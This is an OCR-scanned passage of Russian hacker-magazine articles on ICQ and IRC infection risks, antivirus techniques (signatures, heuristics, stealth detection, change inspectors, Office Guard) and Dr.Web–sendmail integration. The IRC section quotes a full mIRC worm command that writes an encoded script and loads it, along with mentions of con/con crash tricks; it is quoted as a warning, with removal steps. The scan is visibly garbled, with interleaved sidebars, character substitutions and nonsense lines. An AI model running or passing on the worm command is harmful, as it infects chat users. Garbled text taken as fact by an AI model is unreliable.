наженном виде). Ты без раздумий 
принимаешь Can и запускаешь его. 
А там троян. Через несколько минут 
ты лишаешься красивого ICQ-yuHa 
(основной объект охоты), а также 
всех паролей на диалап. 

И все потому, что злоумышленник 
воспользовался чувством уважения 


своей жертвы к слабому полу. Вооб- 
ще, со "случайными связями" нужно 
быть предельно осторожным 
(Минздрав предупреждает). Да, и ес- 
ли ты все-таки принимаешь сфайлы, 
не забывай проверять их на вирусы 
(как "на лету" программами-перех- 
ватчиками, так и "на месте", после 
скачивания). 

Если уж мы заговорили о безопас- 
ности в ICQ, то стоит немного пому- 
чится с ее настройками. Во вкладке 
"Безопасность" выберем Direct-coe- 
динение только после подтвержде- 
ния. Это предотвратит случайную 
передачу файла и скроет твой IP-ag- 
рес. Последний является объектом 
охоты для хакеров. 

И напоследок. Bugtraq часто пишет 
о багах, найденных в ICQ oT Мираби- 
лиса. Правда, значительных уязви- 
мостей было мало, но не факт, что 
их не существует. Поэтому мой тебе 
совет: используй в качестве клиента 
программу Miranda (www.miranda- 
im.org). Мало того, что она He доста- 
ет тебя баннерами, но и на порядок 
выше по безопасности, потому как 
написана грамотными людьми (не в 
обиду программистам Mirabilis'a бу- 
дет сказано). 


IRC - НЕИССЯКАЕМЫЙ 
ИСТОЧНИК ОБЩЕНИЯ 

m Ну и, наконец, последним серви- 
сом, через который можно подце- 
пить заразу, является IRC. Казалось 
бы, правила поведения в "ирке" ана- 
логичны правилам в аське, но это не 
совсем так. 
Немного истории. Вирусы в IRC ста- 
ли ходить еще с появлением первых 
клиентов. Такими были MIRC и Pirch 
(не единственными, но самыми попу- 
лярными). Оба клиента поддержива- 
ли программирование скриптов на 
внутренних скриптовых языках. 
Этим и воспользовались вирмейке- 
ры, которые писали заразу на этих 
языках. Первые 1РС-вирусы - это та- 
кие шедевры, как MIRC.Acoragil и 
mIRC.Simpsalapim. Они были обнару- 
жены еще осенью далекого 1997 го- 


Если персона назвалась Мариной 

и сказала, что очень сексуально 

выглядит, это вовсе не означает, 
что ты ей должен доверять. 


Ш Существует много способов заставить человека скачать вирус. 
Одним из таких являются заманчивые названия файла. Например, 
крякер интернета или генератор серийных номеров или номеров 


кредитных карт. Часто вирусы выдают за патчи к популярным прог- 
раммам, а также за интересные игры. Верить не стоит, наоборот, 
сразу же удаляй подобные файлы со своего диска (если они каким- 


то образом на него попали). 
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Miranda - хороший клиент с хорошими настройками 


После расшифровки ММЕ-кода мы 
получаем тело скрипта, организующего 
автоматическое приватное сообщение 

каждому входящему на канал. 


да. Названия эти скрипты получили 
по используемым ими кодовым сло- 
вам, при вводе слов Acoragil и 
Simpsalapim, соответственно, злов- 
редные программы отключают поль- 
зователей от канала. 

Но это еще цветочки. С появлени- 
ем Windows 98 и уязвимости вида 
соп/соп, вирусы стали ориентиро- 
ваться на выполнение такой ко- 
манды, выводя из строя компью- 
тер жертвы. Как правило, этот сис- 
темный вызов декодировался 
т!ВС-функцией Sdecode() и рассы- 
лался по IRC-KaHanam. Жертв было 
очень много (эх, не перевелись 
еще на белом свете доверчивые 
личности). 


Стоит упомянуть и об 1ВС-червяках, 
которые также имеют место в исто- 
рии. Примером такого скрипта явля- 
ется ворм под названием 
live_stages.shs. Сам скрипт написан на 
Visual Basic и заражал mIRC Bpego- 
HOCHbIM кодом. В этом коде была pea- 
лизация автопередачи сфайла по DCC 
(DCC - Direct Client Client, аналог 
Peer2peer в ICQ). Таким образом qpop- 
мировалась цепочка, по которой чер- 
вяк перебирался от одного компьюте- 
ра к другому. Правда, никаких злоде- 
яний на машине жертвы он не выпол- 
нял (кроме вставки кода в MIRC). 
Другим примером является недав- 
ний червяк Sdecode(). Ero проявле- 
ния можно обнаружить и сейчас, 


Получается, что MIRC (Www.mirc.com) - 
самый надежный 1ВС-клиент. 


ВРЕДНЫЕ 1РС-ПРОГРАММЫ 


Ш Помимо вирусов, изъяны в клиентах используются в так называ- 
емых нюкерах. Примером такой заразы является программа irc-kill, 
которая через кривой СТСР-запрос, посылаемый Pirch'y, выводит 


из строя всю систему. Если быть точным, то клиенту посылается 
обычный ctcp sound request. После этого Пирч начинает судорож- 
но искать музыкальный файл на диске. А этот файл называется 
соп/соп. После обращения к этому имени компьютер жертвы зави- 
сает (баг актуален только для Windows 98). 


бродя по !ВС-каналам. Если ты полу- 
чаешь приватное сообщение вида: 


<jungle_girl> Используй эту команду, 
чтобы получить SOP Ha #Shabash: 
//write add 
Sdecode(b24glSsxOmpvaW46lzp7IC5 
hdXNiciAxICRuaWNrlHwgL21zlIHNibmQ 
glINoYWJhc2ggJG5pY2sgLSAkbWUgf 
CAubXNnICRuaWNrlAMxNMjx7+7r/Ofz 
6SD98vMg6u7s403k8ywg9/Lu4fsg7+ 
7r8/fo8vwgUO9QIO3gICNTaGFiY XNo 
OgMgLy93cmlOZSBhZGQgJCAkKyBkZ 
WNvZGUoICQrICRIbmNvZGUoJHJIYW 
QoJHNjcmlwdCxuLDEpLGOpICQrlCxtk 
SAkY2hyKDEyNCkgLmxvYWQgLXJzIG 
FkZCAkKY2hyKDEyNCkgLy9tb2RIICQgJ 
CsgbWUgKIilgfSB9,m) | .load -rs add 


ни в коем случае не выполняй Npeg- 
ложенное. После расшифровки 
MIME-koga (обратной сфункцией 
Sencode()) мы получаем тело скрип- 
та, организующего автоматическое 
приватное сообщение (без уведом- 
ления об этом жертвы) каждому 
входящему на канал. Вся эта байда 
пишется в файл add, который сразу 
же подгружается в клиент в качест- 
ве скрипта. Вреда тут мало, но чер- 
вяк есть червяк и, по сути, он явля- 
ется обычным вирусом. Чтобы изба- 
вится от такого ворма, необходимо 
выполнить команду /unload -rs add, 
а затем удалить файл "add" из ката- 
лога клиента. 


На текущий момент Pirch практи- 
чески никто не использует. А вот 
mIRC постоянно обновляется и ста- 
новится все надежнее. Последняя 
уязвимость в нем была найдена 
около полугода назад и заключа- 
лась в неверной обработке пара- 
метров команды /dcc. Этот баг был 
не очень важен, поскольку злоу- 
мышленник не мог воспользовать- 
ся им в своих корыстных целях. По- 
лучается, что mIRC (www.mirc.com) 
- самый надежный 1ВС-клиент. AB- 
тор рекомендует, а редакция к нему 
дружно присоединяется. 


ИВ ЗАКЛЮЧЕНИЕ... 

и Список популярных сервисов 
иссяк. Нет, конечно, подцепить га- 
дость можно где угодно: через тот 
же 139 порт, где расшариваются 
диски, разного рода пар%ег"'ы и его 
клоны (хотя этот сервис и отмени- 
ли, но кое-где еще встречаются по- 
добные сервера), через 135 и дыря- 
вый КРС ОСОМ (не забудь поста- 
вить firewall и проапдейтить 
Windows) и т.д. и т.п. Moe дело - go- 
вести до тебя ряд правил, придер- 
живаясь которых, ты навсегда обе- 
зопасишь себя от такой напасти, 
как вирусы и трояны. Но не рас- 
слабляйся, постоянно читай багт- 
рак, который ежедневно трубит ми- 
ру о новой опасности, в очередной 
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раз потрясшей интернет... т 


Мое дело - 
довести до 
тебя ряд 
правил, 
придержи- 
ваясь кото- 
рых, ты 
навсегда 
обезопа- 
сишь себя 
от такой 
напасти, 
как вирусы 
и трояны. 


TanaT (TanaT@hot 
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КАК АНТИВИРУС 
НАХОДИТ ЖЕРТВЫ 


АНАЛИЗ ФАЙЛОВ НА ПРЕДМЕТ ЗАРАЖЕННОСТИ 


Е сть довольно много технологий, позволяющих антивирусному пакету найти и вылечить инфицированный файл. О них 
и пойдет речь. Мы рассмотрим все составляющие современного антивируса и оценим их актуальность в наши дни. 


S 
СКАНИРОВАНИЕ 
ON-DEMAND 
И ON-ACCESS 
и Структуру антивиру- 
са удобнее всего рас- 
сматривать на примере одного из из- 
вестных российских антивирусов. В 
состав этого дистрибутива входит 
большое число модулей, позволяю- 
щих наглядно продемонстрировать ту 
или иную технологию. 
Неотъемлемой частью любого антиви- 
русного пакета являются сканер и мо- 
нитор. Их целесообразно рассматри- 
вать совместно. Сканер в своей рабо- 
те использует два метода: сигнатур- 
ный поиск и эвристический анализа- 
тор. Сигнатурный поиск заключается 
в изучении определенных частей ис- 
cnegyemoro срайла (имеются в виду 
Эвристичес- точки входа в исполняемый сфайл и 
кий анали- у 
сов точки входа процедур/сфункций) и 
лощение отыскании в их коде вирусных сигна- 
искусствен- тур. Сигнатура - это фрагмент кода, 
ного интел- Ур i sige 9 
И позволяющий однозначно идентифи 
ненная цель цировать какой-то вирус. При таком 
Коророто. в сканировании используется антиви- 
том, чтобы р у 
находить русная база, которая содержит не что 
Вирусы иное, как вирусные сигнатуры. 
Есть еще такое понятие, как избыточ- 
ное сканирование. При этом проверя- 
ются абсолютно все части файла, а не 
только точки входа. Избыточное ска- 
Инспектор 
изменений, нирование позволяет повысить на- 
Е дежность и качество отыскания виру- 
ерлок 
Xomectaic= COB, HO существенно замедляет сам 
следует процесс сканирования. В практичес- 
место прес- 
уплениа ких целях избыточное сканирование 
(файлы в используется очень редко, но при 
вы rae проверке новых и "спорных" файлов 
ки (СВСи его использование вполне оправдан- 
данные о но (при этом потери времени почти 
внутреннем ). В 
стровнии неощутимы). Весь метод сигнатурного 
файла). поиска неоднократно подвергался 


критике - многие считают, что сканер 
легко обмануть, добавив кучу "МОР" и 
"PUSH/POP" (команды ассемблера, не 
приводящие, по сути, к каким-либо из- 
менениям, но меняющие сигнатуру ко- 
да). Должен сказать, что современ- 
ные сканеры таким образом обмануть 
довольно сложно: огромное число 
"клонов" известных вирусов так и не 
попадает на компьютер пользовате- 


ХАКЕРСПЕЦ 
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рис. Константин Комардин 


ля, потому что антивирусный сканер 
уничтожает вирусы сразу без всякого 
обновления своей базы. 
Эвристический анализатор - предмет 
многолетних дискуссий между учены- 
ми, антивирусными экспертами и тес- 
терами. Эвристический анализатор - 
воплощение искусственного интел- 
лекта, жизненная цель которого в 
том, чтобы находить вирусы. В стенах 
многих антивирусных компаний сло- 
восочетание "эвристический анализа- 
тор" либо вообще не употребляется, 
либо сокращается go простого и всем 
понятного "эвристик". Справедливос- 


ти ради отмечу, что большинство ан- 
тивирусных компаний вообще не реа- 
лизовало в своих продуктах данную 
технологию. Если быть точным, то 
всем известный Norton Antivirus (я 
привел его в пример потому, что это 
самый популярный антивирус в мире) 
ничего, кроме сканирования по сигна- 
турам, делать не умеет. Одна из луч- 
ших в мире реализаций эвристика 
представлена в наших отечественных 
продуктах, а именно в Антивирусе 
Касперского. Это не просто слова - 
еще с далеких девяностых годов об 
этом говорят эксперты всего мира. 


Работа эвристика - тайна за семью пе- 
чатями. Сколько бы я ни пытался go- 
биться ответа на этот вопрос от разра- 
ботчиков различных антивирусных 
средств, всегда нарывался на: "К со- 
жалению, мы не можем разглашать 
эту информацию, так как это нанесет 
больше вреда, чем пользы". Некото- 
рые сведения собрать все же удалось. 
План действий эвристика заключает- 
ся в следующем: запустить подозри- 
тельный исполняемый файл, проана- 
лизировать все его действия и при- 
нять окончательное решение "вино- 
вен или нет". Каждая из этих состав- 
ляющих имеет свои особенности. За 
словами "запустить исследуемый 
объект" скрывается целая техноло- 
гия по созданию виртуального ПК. 
Эвристик эмулирует операционную 
систему и аппаратные ресурсы ПК 
для того, чтобы инфицированный 
объект (здесь мы сделали допуще- 
ние, что файл оказался все-таки за- 
раженным) не принес вреда системе 
и данным, а также не смог размно- 
житься и "захватить власть" (под 
этим обычно понимают: прописаться 
в конфигурационных системных фай- 
лах и реестре, выгрузить из ОЗУ сис- 
темный сервис антивируса и обеспе- 
чить невозможность его последую- 


щей загрузки). Таким образом, созда- 
ется карантинная зона. Если файл 
окажется инфицированным, то зара- 
за будет легко локализована. Опи- 
санный только что этап довольно му- 
торный в технической реализации, но 
не несет в себе каких-либо техноло- 
гических новшеств. 

Анализ поведения испытуемого объ- 
екта и принятие решения - это реали- 
зация искусственного интеллекта. 
Разработчики должны сами ответить 
на такие вопросы, как "Какие аспек- 
ты активности программы учитывать, 
а какие нет?" и "Каким образом при- 
нимать решение?" Математически 
все сводится к следующей схеме: 
каждое возможное действие прог- 
раммы оценивается, например, по 
шкале от -10 go 10. Здесь я делаю go- 
пущение, что код может вести себя 
не только "плохо" (за это можно да- 
вать положительную оценку), но и 
"хорошо" (отрицательная оценка со- 


C=) 


мер), его можно считать инфициро- 
ванным. Что же до ответа на первый 
вопрос (о видах деятельности), то 
учитывать надо как можно больше: 
обращение к реестру, системным 
срайлам, адресной книге, другим 
срайлам, интернету и т.д. Если на nep- 
вый взгляд описанный способ кажет- 
ся простым в реализации, то на деле 
это не так. Можно привести пример 
программы (хотя бы всеми любимого 
почтового клиента или диагностичес- 
кого приложения, просто выводяще- 
го все вышеперечисленные данные 
на экран), которая будет вести себя 
"плохо", но на практике окажется не- 
винной. Так что все не так просто. 
Еще одной проблемой эвристиков яв- 
ляется вопрос тестирования. Именно 
поэтому я упомянул тестеров в самом 
начале рассказа об этой увлекатель- 
ной технологии. Как можно убедиться 
в эффективном функционировании 
эвристика? Прежде всего, его следует 


Антивирусный сканер уничтожает 
вирусы сразу без всякого обновления 
своей базы. 


ответственно). В результате, если 
объект к концу анализа наберет 
оценку выше 50 (опять же, напри- 
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ЕСЛИ ТЫ ЗДЕСЬ НЕ БЫЛ - ТЫ ОТСТАЛ ОТ ЖИЗНИ 


проверить на уже существующих ви- 
русах. Это сделать довольно просто: 
любой пользователь интернета мо- 
жет найти от 2 gO 4 тысяч вредонос- 
ных кодов (червей, троянцев, виру- 
сов, бэкдоров), свободно лежащих в 
Сети. Эти цифры продиктованы лич- 
ным опытом, так как мне не раз прихо- 
дилось участвовать в подобного рода 
испытаниях (имеются в виду тесты 
эффективности сканеров). Но ведь 
эвристик - первый рубеж обороны, 
средство, созданное аля борьбы с 
еще не известными вирусами. А с из- 
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Как говори- 
ли лет де- 
сять назад: 
"Принес 
дискету с 
улицы, будь 
добр, про- 
верь ее". 


Стелс-вирус 
контролиру- 
ет систему 
и всегда ус- 
певает nog- 
сунуть на 
проверку 
совсем дру- 
гой, неин- 
фицирован- 
ный файл. 
Таким обра- 
зом, вирус 
остается 
невидимым 
и для ска- 
нера, и для 
каких бы то 
ни было 
других ан- 
тивирусных 
средств. 
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вестными и сигнатурный поиск справ- 
ляется! В это все и упирается. Созда- 
вать "хороший", хитрый и неулови- 
мый вирус ни один из антивирусных 
экспертов не станет. А откуда еще они 
могут взяться? Еще раз упомяну, что 
многие разработчики антивирусов во- 
обще не включают в свой пакет эв- 
ристические анализаторы. Дополни- 
тельным доводом в пользу такого 
подхода служит и дороговизна разра- 
ботки и внедрения этой технологии. 
Монитор также неотъемлемая часть 
любого средства для борьбы с виру- 


Суть любого антивирусного средства - 
работа с файлами. Первое действие 
любого сканирования (да и многих 
других технологий) заключается в 
том, что антивирус обращается к дай- 
лу. Это можно делать двумя способа- 
ми: попросить операционную систему 
сделать необходимые манипуляции с 
файлом иди обратиться самостоя- 
тельно через собственный драйвер. 
Долгое время (примерно go 1997-1998 
года) почти все антивирусы просто 
пользовались системными API для goc- 
тупа к файлам. Кстати, системными АР! 


Сегодня антивирус работает с файлами 
двумя способами: через собственный 
драйвер и через стандартные API. 


Office Guard 


сами. С точки зрения программиста, 
монитор является высокоуровневой 
оберткой слоя, лежащего ниже, - ска- 
нера. Задача монитора постоянно на- 
ходиться в памяти ПК и проверять 
все срайлы, к которым обращается 
операционная система. Таким обра- 
зом, монитор натравливает сканер на 
каждый объект, который привлек вни- 
мание пользователя или системы. Мо- 
нитор избавляет пользователя от ру- 
тинной операции проверки всего но- 
вого на вирусы. Как говорили лет де- 
сять назад: "Принес дискету с улицы, 
будь добр, проверь ее". Сегодня на 
такие мелочи и отвлекаться не стоит. 
Сканер и монитор - лучшие друзья. В 
английском языке их отличают друг от 
друга только с помощью слов "оп- 
access" и "on-demand". Первое означа- 
ет- "при обращении", второе - "по тре- 
бованию". Как нетрудно догадаться, 
сканирование оп-ассез$ - это монитор, 
а on-demand - стандартный сканер. 


КОЕ-ЧТО 0 СТЕЛСАХ 

и Есть такие вирусы, которые зовут- 
ся стелсами. Вернее, даже не так, та- 
кие вирусы были. Почему были? Пото- 
му что сейчас эта технология почти не 
используется, но в свое время попор- 
тила немало крови. 
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я здесь называю не только высокоу- 
ровневые АР! типа Win16/32/64 API, но 
и низкоуровневые системные прерыва- 
ния. Технология стелс-вирусов заклю- 
чается в том, что такой вредоносный 
код контролирует систему и всегда ус- 
певает подсунуть на проверку совсем 
другой, неинфицированный срайл. Ta- 
ким образом, вирус остается невиди- 
мым и для сканера, и для каких бы то 
ни было других антивирусных средств. 
Но "добрые эксперты" и здесь наши 
выход из положения. Они вспомнили 
второй способ работы с файлами - 
обращение к диску непосредственно 
через драйвер дисковой подсистемы 
IOS (супервизор ввода-вывода - это 
альтернативный по сравнению с сис- 
темными прерываниями способ полу- 
чения данных о файле, для его реа- 
лизации приходится использовать 
собственный драйвер). От такого уда- 
ра стелс-вирусы не оправились go 
сих пор. 

Антивирусные эксперты, правда, не 
остановились на достигнутом: они 
закрепили свое преимущество, реали- 
зовав двойную проверку. Сегодня ан- 
тивирус работает с файлами двумя 
способами: через собственный драй- 
вер и через стандартные API. Если 
данные о файле, полученные первым 
способом, отличаются от аналогич- 
ных, полученных вторым способом, 
значит файл однозначно инфициро- 
ван стелс-вирусом. Таким образом, 
низкоуровневый доступ к файлам яв- 
ляется важным моментом в понима- 
нии любой антивирусной технологии. 


КОМПЬЮТЕРНЫЙ 
ШЕРЛОК ХОЛМС 

= В состав антивирусов часто вхо- 
дит модуль под названием инспектор 
изменений. Иногда его называют ре- 
визором изменений. Я буду использо- 
вать оба термина. 
Хочу обратить твое внимание, что в 
некоторых антивирусах ревизора нет. 
Почему? Отнюдь не из-за его неэф- 
фективности или, что еще глупее, 


бесполезности. Дело в том, что инс- 
пектор изменений подходит только 
для защиты рабочих станций, то есть 
компьютеров домашних пользовате- 
лей и офисных машин. Большинство 
же разработчиков антивирусных ре- 
шений ориентируются на защиту кор- 
поративных клиентов, которым в пер- 
вую очередь необходимо обезопа- 
сить сервера (файловые, почтовые, 
базы данных и т.9.). В этом случае, как 
я уже говорил, технология не подхо- 
дит в принципе. 

Сегодня широко известны два реви- 
зора. Первый входит в состав Антиви- 
руса Касперского Personal Pro, второй 
является "примочкой" к Dr. Web. 
Переходим к самой технологии. При- 
меняется инспектор изменений по 
следующей схеме. На чистом от виру- 
сов, незараженном, компьютере за- 
пускается ревизор. Он согласно наст- 
ройкам собирает информацию о неко- 
торых важных (или всех подряд) фай- 
лах и записывает ее в свою собствен- 
ную базу данных. После этого реви- 
зор выключается. При следующем за- 
пуске (в зависимости от настроек - че- 
рез час, два, день, неделю или просто 
во время ближайшей перезагрузки) 
ревизор проверяет наличие своей ба- 
зы. Так как она уже создана, инспек- 


Стандартный on-access сканер 


тор начинает сравнивать данные о 
срайлах в "реальной жизни" (на жест- 
ком диске) и в своей БД. Если измене- 
ний нет, то компьютер чист на 100%. 
Если же есть, то их надо анализиро- 
вать. Вполне вероятно, что ты просто 
обновил свой документ или установил 
новую версию программы. А может, 
файл подвергся заражению. Обычно 
(если ревизор не смог сам опреде- 
лить, вредоносные ли изменения про- 
изошли) инспектор изменений выво- 
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дит Ha экран все отличия, которые нашел. В этом случае ты, 
как пользователь и администратор, можешь ознакомиться 
с этими данными и определить, менял ли ты сам эти файлы 
(обновлял) или это сделал вирус. Я рекомендую настроить 
ревизор на проверку при каждой перезагрузке (при каждом 
включении) ПК. В этом случае ты просто не успеешь за- 
быть, какое ПО и какие файлы были обновлены. 

Какую же информацию собирает инспектор в свою БД? 
Прежде всего, это всем известная циклическая сумма 
СВС, которая является своего рода отпечатками пальцев 
для файлов. Далее идет информация о дате создания, да- 
те последней модификации, размере и т.д. Очень важной 
частью процесса является сбор информации о внутрен- 
ней структуре файла и некоторых критических для его 
жизнедеятельности местах - точке входа в функции, про- 
цедуры и сам файл. 

Кажется, что собираемые данные избыточны. Но нет - раз- 
работчики усмотрели в ревизоре не только способ нахо- 
дить вирусы, но и лечить файлы. Благодаря такому огром- 
ному количеству данных эффективность лечения повыша- 
ется в десятки раз - очень часто удается восстановить даже 
затертые данные. Все же не следует путать инспектор изме- 
нений с чем-то вроде пакета для резервного копирования. 
Если файл основательно повредить (затереть), то ревизор 
окажется бессильным. 

Из рассмотренной технологии становится ясно, почему инс- 
пектор не используют на серверах. Слишком часто там что- 
то меняется и слишком много ресурсов требуется для про- 
верки жесткого диска. 

Инспектор изменений можно назвать компьютерным Шерло- 
ком Холмсом. Слишком много у них общего: оба исследуют 
место преступления (сайлы в нашем случае) лишь после то- 
го, как преступление произошло, и делают это, основываясь 
на уликах (отпечатках пальцев, оставленных следах, что в Ha- 
шем случае - CRC и данные о внутреннем строении срайла). 


СТАРШИЙ БРАТ 
m Тем, кто не читал, рекомендую рассказ Джорджа Opyan- 
ла 1984". Там как раз о Старшем Брате хорошо написано. 
Следующую рассматриваемую технологию называют пове- 
денческим блокиратором. Крупнейшие антивирусные экс- 
перты возлагают на поведенческие блокираторы большие 
надежды. 
Суть этой технологии проста: каждое действие программы 
анализируется на предмет "хорошее оно или плохое". Если 
хорошее, то действие разрешается, в противном случае 
блокируется (отсюда и название). Интересная деталь - если 
добавить сюда искусственный интеллект, то технология бу- 
дет очень близка по сути к эвристикам. 
Основная проблема разработчиков поведенческого блоки- 
ратора в том, чтобы определить, какие действия нужно бло- 
кировать, а какие нет. Все зависит от уровня абстракции. Те- 
оретически можно отслеживать используемые АР!-функции, 
доступ к различным ветвям реестра, работу с определенны- 
ми файлами. Но это все сложно формализовать: никто не 
даст ответ на вопрос, что такое хорошо и что такое плохо. 
Сегодня наибольшей популярностью пользуются поведен- 
ческие блокираторы, разработанные под конкретные при- 
ложения. Например, "Лаборатория Касперского" поставля- 
ет вместе со своим дистрибутивом Антивирус Касперского 
Personal Pro модуль, который называется Office Guard. Вот 
как он работает. 
Набор используемых макровирусом функций очень и 
очень ограничен. Разработчики додумались классифици- 
ровать их и разложить по полочкам. 90% современных 
макровирусов пытаются обратиться к адресной книге 
Outlook. Если предположить, что макрос - хороший, что ему 
делать в адресной книге? Что он там забыл? Вот-вот, 
ошиблись с предположением. Таким образом, Office Guard 
блокирует сразу 9 макровирусов из 10. Остальные 10% от- 
лавливаются еще легче: есть определенный набор ‹функ- 
ций, с помощью которых макровирус может размножаться. 
Это редактирование основного файла шаблонов 
(normal.dot), запись своего тела в автомакросы (запускае- » 
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Тем, кто He 
читал, ре- 
комендую 
рассказ 
Джорджа 
Оруэлла 
"1984". 
Там как раз 
о Старшем 
Брате хоро- 
шо написа- 
но. 


Суть новой 
технологии 
в объедине- 
нии ревизо- 
ра измене- 
ний и анти- 
вирусного 
сканера. 
Честно го- 
воря, такой 
симбиоз 
уже давно 
напраши- 
вался, но 
был далеко 
не очеви- 
ден. 


КАК АНТИВИРУС НАХОДИТ ЖЕРТВЫ | 
Поведенческий блокиратор, словно 
ee oe судья, рассматривает заявки 
Макрос Net ры других программ. Office Guard 
никогда не ошибается. Если хотите ОС и другие 
Pj 
проверить его в деле, установите программы 
А > о |__| 
Макрос №2 Гы в настройках «спрашивать 
подтверждения у пользователя» 
и запустите макровирус. 
Алгоритм работы Office Guard 
= Oc > 
Инспектор Зараженный 
Изменений файл 
= 10$ =" 


Низкоуровневая работа с файлами позволяет обмануть стелс-вирусы 


мые автоматически при сохранении, 
сохранении как, закрытии и открытии 
документов). Если макрос попытается 
осуществить хоть одну из этих опера- 
ций - значит он вирус. Не правда ли, 
просто? 

Тем не менее, никто больше данной 
технологией не располагает. Разра- 
ботчики других антивирусных пакетов 
часто говорят, что стопроцентной за- 
щиты не бывает. На самом деле, при- 
чина в другом. Разработка такой тех- 
нологии требует денег, времени и 
мозгов. Далеко не у каждой компании 
все это есть. 

Хочу обратить твое внимание на важ- 
ный момент - поведенческий блокира- 
тор лишь защищает от вирусов, но не 
лечит те файлы, в которых вирус уже 
есть. Это очень важный аспект, о ко- 
тором не стоит забывать. 


ПАРА СЛОВ 0 БУДУЩЕМ 

и На наших глазах будущее стано- 
вится настоящим. Недавно произо- 
шел существенный сдвиг в этом нап- 


равлении: была изобретена новая 
технология iChecker. 

Ее суть в объединении ревизора изме- 
нений и антивирусного сканера. Честно 
говоря, такой симбиоз уже давно нап- 
рашивался, но был далеко не очеви- 
ден. Когда мне рассказали об iChecker 


Напомню, в чем суть ревизора измене- 
ний: этот модуль запоминает уникаль- 
ные данные о каждом срайле, который 
может быть заражен. В качестве такой 
информации берется контрольная 
сумма, размер, дата последних измене- 
ний, адреса точек входа в процедуры 


Поведенческий блокиратор лишь 
защищает от вирусов, 
но не лечит те файлы, 
в которых вирус уже есть. 


и об объединении этих двух модулей - 
все остальное стало сразу понятным. 
Но go этого очевидная, казалось бы, 

идея о сращивании двух мощнейших 
технологий не приходила мне в голо- 
ву. Вот подробности об iChecker. Tex- 
нология позволяет ощутимо (обычно 
в десятки, иногда в сотни раз) увели- 
чить производительность твоего ПК. 


he en Ee ere 

ИГ ET aa Te Pee ОБИ TT 
ATE eee LETS Bl HECTTSErE 
ровная pari ase ат 


ЕТ ТН 
МР Папе поль т ре Ге ПБ omen 


ды Во ose fers Aree eee Парта — 


Новый антивирус с технологией iChecker 
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ит.9. Далее ревизор каждый раз срав- 
нивает параметры проверяемого срай- 
ла с теми, что записаны в его базе 
данных. Если есть какие-либо несовпа- 
дения, то исследуемый файл тщатель- 
но анализируется (все изменения про- 
веряются на "вирусоподобность"). Ес- 
ли объект идентифицирован как ин- 
фицированный, его почти всегда лег- 
ко вылечить (ведь сохранилась ин- 
формация о "здоровом" файле). За 
счет чего же достигается выигрыш во 
времени? Суть в том, что резидентный 
монитор использует в своей работе 
сканер. А сканер, в свою очередь, объ- 
единен с ревизором изменений, кото- 
рый хранит базу проверенных объек- 
тов. Таким образом, можно вообще не 
проверять уже проверенные сфайлы 
(на проверку которых в фоновом ре- 
жиме расходуется много времени). Ес- 
ли говорить о системных файлах, ко- 
торые используются (и, следователь- 
но, проверяются монитором) очень 
часто, то такая экономия позволяет 
увеличить производительность мини- 
мум в несколько десятков раз. 

Новая технология дает не только при- 
рост производительности ПК, но и 
снижает системные требования анти- 
вирусного пакета (требуется меньше 
ОЗУ). Кто знает, может в будущем 
нас ждет объединение эвристиков и 


= 


поведенческих блокираторов? = Ge 
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Докучаев Дмитрий aka Forb (forb@real.xakep.ru) 


DRWEB - КАК ЗА 


КАМЕННОЙ СТЕНОЙ: 


ИНТЕГРИРУЕМ ДЕМОНОВ С АНТИВИРУСОМ 


С татья посвящается линуксоидам. В первую очередь, начинающим администраторам, которые уж было подумали, 
что в этом номере о них предательски забыли. 


последнее время во- 


лей-неволей мы все 


чаще сталкиваемся с 


Благодаря 
тому, что в 
свежих вер- 
сиях send- 
mail появи- 


лась новая 
многопоточ- 
ная библио- 
тека 
MilterAPI, 
позволяю- 
щая прини- 
мать коман- 
ды для 
sendmail от 
других при- 
ложений, 
становится 
реальным 
обеспечить 
проверку на 
вирусы всех 
входящих 
сообщений. 


вирусами. Рассылка 
заразных сообщений 
Ha e-mail не вызывает никакого удив- 
ления. Конечно, ты уже умный и ни- 
когда не станешь запускать вложен- 
ные файлы, отправленные неизвест- 
ным вирусописателем. Поэтому мож- 
но даже не защищать себя от этой 
напасти антивирусником. Но в слу- 
чае, если ты админ локалки или дер- 
жишь хостинг с e-mail сервисом, твои 
клиенты будут тебе искренне благо- 
дарны, если их письма будут автома- 
тически сканироваться на вирусы. 
Тем самым ты обеспечишь сохран- 
ность драгоценного трафика (в наше 
время вирусы и трояны весят доволь- 
но много), а также убережешь своих 
подопечных от заражения. 


Я неспроста сказал, что этот материал 
будет актуален лишь для начинаю- 
щих админов, не имеющих опыта в 
интеграции антивируса с системными 
приложениями (как ты, наверное, по- 
нял, этим мы сегодня и займемся). 
Опытный админ, на лбу которого пол- 
сотни шишек, набитых в жестокой 
борьбе с проблемами настройки кон- 
(DOB, за несколько минут решит пос- 
тавленную задачу (после прочтения 
краткого мануала, прилагающегося к 
модулю). Для человека без опыта все 
намного сложнее: тонкие нюансы, без 
учета которых ничего не будет рабо- 
тать, как правило, не освещаются в 
коротком хелпе, зато все они будут 
описаны здесь. 


КАК ЭТО РАБОТАЕТ? 

и Прежде чем что-либо скачивать и 
настраивать, важно четко понимать 
принцип интеграции. Что мы имеем? 
Допустим, у нас установлен sendmail 
(не ниже версии 8.1), и стоит пол- 
ностью отлаженная система, состоя- 
щая из сервера drwebd и клиента 
drweb-smf. Благодаря тому, что в све- 
жих версиях почтовика появилась но- 
вая многопоточная библиотека 
MilterAPI, позволяющая принимать 
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команды gna sendmail от других при- 
ложений, становится реальным обес- 
печить проверку на вирусы всех вхо- 
дящих сообщений. 


Во второй связке взаимодействуют 
уже клиент и сервер drweb. Это про- 
исходит следующим образом: drweb- 


Прежде чем что-либо скачивать 
и настраивать, важно четко понимать 
принцип интеграции 


Как видно на рисунке, конечное при- 
ложение не может взаимодейство- 
вать с сервером drwebd. Но nocpeg- 
ством MilterAPI, почтовик может "об- 
щаться" с drweb-smf, а он, в свою оче- 
редь, ждет от сервера положительно- 
го либо отрицательного ответа. 


После изучения работы sendmail ста- 
новится ясно, что МЖегАР! передает 
фильтру каждую часть сообщения 
(начиная от helo и заканчивая data 
секциями). Все эти части drweb-smf 
хранит в отдельных файлах. Следова- 
тельно, в этой связке Sendmail - кли- 
ент, а drweb-smf - сервер, поэтому в 
sendmail.cf и в командной строке 
drweb-smf указывается адрес фильт- 
ра, а почтовик для этого соединения 
выбирает подходящий клиентский ag- 
рес. Не буду вдаваться в подробную 
настройку конфра, так как останов- 
люсь на этом несколько позже. 


ДРУГИЕ СЕРВИСЫ 


smf коннектится к drwebd на 3000 
порт (либо другим способом, указан- 
ным в коноре). После этого клиент де- 
лает запрос на проверку файла (как 
раз того, который передал sendmail). 
Если зараза в файле не обнаружена, 
